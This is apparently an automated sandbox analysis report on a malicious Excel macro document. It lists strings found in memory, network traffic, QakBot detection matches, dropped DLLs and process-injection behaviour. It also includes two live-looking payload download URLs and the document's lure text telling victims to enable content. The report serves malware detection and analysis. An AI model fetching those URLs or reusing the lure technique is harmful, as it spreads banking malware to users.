          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS traffic detected: queries for: carpascapital.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.aadrm.com/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.cortana.ai
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.diagnostics.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.microsoftstream.com/api/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.office.net
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.onedrive.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://apis.live.net/v5.0/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://augloop.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://augloop.office.com/v2
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          Source: intlsheet1.binString found in binary or memory: https://carpascapital.com/gBPg8MtsGbv/ka.html
          Source: intlsheet1.binString found in binary or memory: https://carpascapital.com/gBPg8MtsGbv/ka.html%
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://cdn.entity.
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://clients.config.office.net/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://config.edge.skype.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://cortana.ai
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://cortana.ai/api
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://cr.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://dataservice.o365filtering.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://dataservice.o365filtering.com/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://dev.cortana.ai
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://devnull.onenote.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://directory.services.
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://graph.ppe.windows.net
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://graph.ppe.windows.net/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://graph.windows.net
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://graph.windows.net/
          Source: intlsheet1.binString found in binary or memory: https://gruasphenbogota.com/C74hwGGxi/ka.html
          Source: intlsheet1.binString found in binary or memory: https://gruasphenbogota.com/C74hwGGxi/ka.html%
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://incidents.diagnostics.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://lifecycle.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://login.microsoftonline.com/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://login.windows.local
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://management.azure.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://management.azure.com/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://messaging.office.com/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://ncus.contentsync.
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://ncus.pagecontentsync.
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://officeapps.live.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://onedrive.live.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://onedrive.live.com/embed?
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://outlook.office.com/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://outlook.office365.com/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://pages.store.office.com/review/query
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://powerlift.acompli.net
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://settings.outlook.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://staging.cortana.ai
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://store.office.com/addinstemplate
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://tasks.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://templatelogging.office.com/client/log
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://webshell.suite.office.com
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://wus2.contentsync.
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://wus2.pagecontentsync.
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.4:49742 version: TLS 1.2

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.973589332.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: QakBot Payload Author: kevoreilly
          Source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: QakBot Payload Author: kevoreilly
          Source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: QakBot Payload Author: kevoreilly
          Source: 0000000D.00000002.713096999.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: QakBot Payload Author: kevoreilly
          Source: 13.2.explorer.exe.660000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Source: 6.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Source: 4.2.explorer.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Source: 4.2.explorer.exe.1100000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Source: 3.2.regsvr32.exe.1120000.2.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Source: 6.2.regsvr32.exe.f30000.2.raw.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Source: 6.2.regsvr32.exe.f30000.2.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Source: 3.2.regsvr32.exe.1120000.2.raw.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Source: 13.2.explorer.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
          Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
          Found Excel 4.0 Macro with suspicious formulasShow sources
          Source: plan-1053707320.xlsbInitial sample: CALL
          Found abnormal large hidden Excel 4.0 Macro sheetShow sources
          Source: plan-1053707320.xlsbInitial sample: Sheet size: 22026
          Office process drops PE fileShow sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\gihi1.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\gihi2.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ka[1].htmJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htmJump to dropped file
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000DDC7 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,memcpy,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000E23A memset,GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,FreeLibrary,DeleteFileW,
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\DBGJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D4F80
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D26A7
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D330B
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D1000
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D3820
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D9939
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010DAA35
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010DA637
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D6131
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010DBC4E
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D4149
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D725E
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D875E
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D6956
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D9664
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010DAB67
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010DB877
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010DB1A1
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D11BE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010DA4BE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D4AB1
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D88DE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D90DE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D31D8
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010DBAEC
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D94F8
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D7BF5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10012420
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000F045
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10018490
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10014CBF
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100110C0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10018D30
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10011968
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100155B5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100109C5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100149C5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100115FD
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001C24F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10010A6B
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10011EBA
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001B6CA
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10011721
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10005394
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001E7D6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01118D30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01111968
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_011155B5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_011109C5
